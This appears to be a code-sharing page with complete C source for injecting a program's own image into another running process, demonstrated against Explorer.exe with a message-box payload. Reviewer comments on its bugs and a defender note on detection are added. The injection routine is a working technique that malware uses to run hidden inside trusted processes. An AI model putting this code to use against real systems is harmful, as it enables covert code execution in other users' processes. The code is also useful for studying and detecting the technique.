Process Injection

This project allows you to copy the local process into another remote process and execute it there. There are no requirements for your program for this to work. All you do is call the function, sit back, and the program will run inside the remote address space just as if it were in its own. You do not need to pass memory addresses to the thread because the injected program is placed at its own original address in memory, so all variables and functions defined will still work.
But this will not work on all running processes, because the ImageBase required by the injector executable may already be allocated in the target process, causing VirtualAllocEx to fail. To make this work on all processes you would first have to rebase the injector in memory, then inject it.
The default ImageBase for an executable is most of the time 0x400000, which is available in Explorer.exe, so this process was chosen as the example.
inject.h
/* Injection Prototypes */
#include <windows.h>

/**
 * Copy the calling process's own executable image into the process with id
 * dwPid and start lpStartProc there as a new thread.
 *
 * @param dwPid        Target process id; opened with PROCESS_ALL_ACCESS.
 * @param lpStartProc  Thread entry point. It must live inside this executable's
 *                     image, since that image is what is copied to the target.
 * @param lpParam      Opaque argument passed to lpStartProc via CreateRemoteThread.
 * @return FALSE only when OpenProcess or VirtualAllocEx fails; TRUE otherwise.
 *         The results of WriteProcessMemory and CreateRemoteThread are not
 *         checked, so TRUE does not guarantee the remote thread started.
 *
 * NOTE(review): the process handle opened inside is never closed (handle leak).
 */
BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);
inject.c
#include "inject.h"
/*
 * InjectExecutable: copy this process's own PE image into the process
 * identified by dwPid, at the same virtual address it occupies here, and
 * start lpStartProc in that process as a new thread.
 *
 * dwPid       - target process id, opened with PROCESS_ALL_ACCESS.
 * lpStartProc - thread entry point; must be a function of this image, because
 *               the image (not the function) is what gets copied.
 * lpParam     - opaque argument handed to CreateRemoteThread for lpStartProc.
 *
 * Returns FALSE only when OpenProcess or VirtualAllocEx fails. TRUE is returned
 * regardless of whether WriteProcessMemory or CreateRemoteThread succeeded, since
 * neither result is checked.
 *
 * NOTE(review): hProcess is never closed on any path, and the thread HANDLE
 * returned by CreateRemoteThread is discarded, so both handles leak.
 *
 * Defender note: the OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX)
 * -> WriteProcessMemory -> CreateRemoteThread sequence against a foreign
 * process is the classic remote-thread injection call chain and is what
 * host-based telemetry for this technique keys on; the RWX allocation at a
 * fixed, image-sized address is an additional indicator.
 */
BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
{
    HMODULE hModule, hNewModule;
    DWORD dwSize;
    HANDLE hProcess;
    IMAGE_DOS_HEADER ImageDosHeader;
    /* 32-bit optional-header layout is hard-coded here; a 64-bit image has a
     * different structure (IMAGE_OPTIONAL_HEADER64). */
    IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (hProcess == NULL)
    {
        return FALSE;
    }

    /* Base address of the calling executable's own image. */
    hModule = GetModuleHandle(NULL);
    /* Read the DOS header from the image base, then the optional header, which
     * sits at e_lfanew + the 4-byte PE signature + the file header. */
    CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));
    CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));
    /* Whole mapped image size, used as the copy length below. */
    dwSize = ImageOptionalHeader.SizeOfImage;

    /* Request the same base address (hModule) in the target so the copied code
     * and data need no relocation; fails if that range is already in use there
     * (the limitation described in the page's introduction). The region is
     * requested read/write/execute. */
    hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (hNewModule == NULL)
    {
        /* NOTE(review): hProcess leaks on this path too. */
        return FALSE;
    }

    /* Return values deliberately unchecked by the original; a partial write or
     * thread-creation failure still yields TRUE below. */
    WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);
    CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam, 0, NULL);
    return TRUE;
}
example.c
#include "inject.h"
DWORD WINAPI RemFunc(LPVOID lpParam);
/* Program entry point (the image is built without the CRT): find the shell's
 * "ProgMan" desktop window, resolve the process that owns it, and hand that
 * process id to InjectExecutable with RemFunc as the remote thread entry.
 * Neither the FindWindow result nor InjectExecutable's return value is checked,
 * exactly as in the original. */
void WinMainCRTStartup()
{
    HWND hShellWindow = FindWindow("ProgMan", NULL);
    DWORD dwTargetPid = 0;

    GetWindowThreadProcessId(hShellWindow, &dwTargetPid);
    InjectExecutable(dwTargetPid, &RemFunc, NULL);
}
/* Entry point of the thread started inside the target process. Displays a
 * message box and then ends the thread with ExitThread, so the trailing
 * return is never reached. lpParam is unused.
 * Both strings are reproduced byte-for-byte; the body text looks as if its
 * "\n" escapes lost their backslashes when the page was extracted. */
DWORD WINAPI RemFunc(LPVOID lpParam)
{
    (void)lpParam;

    LPCSTR lpText = "Greetings from the Hijacked Process!!!!nDone with ProcessInjectionn.::ANUBIS::.";
    LPCSTR lpCaption = "Explorer";

    MessageBox(HWND_DESKTOP, lpText, lpCaption, MB_OK);
    ExitThread(0);
    return 0;
}
Author: ANUBIS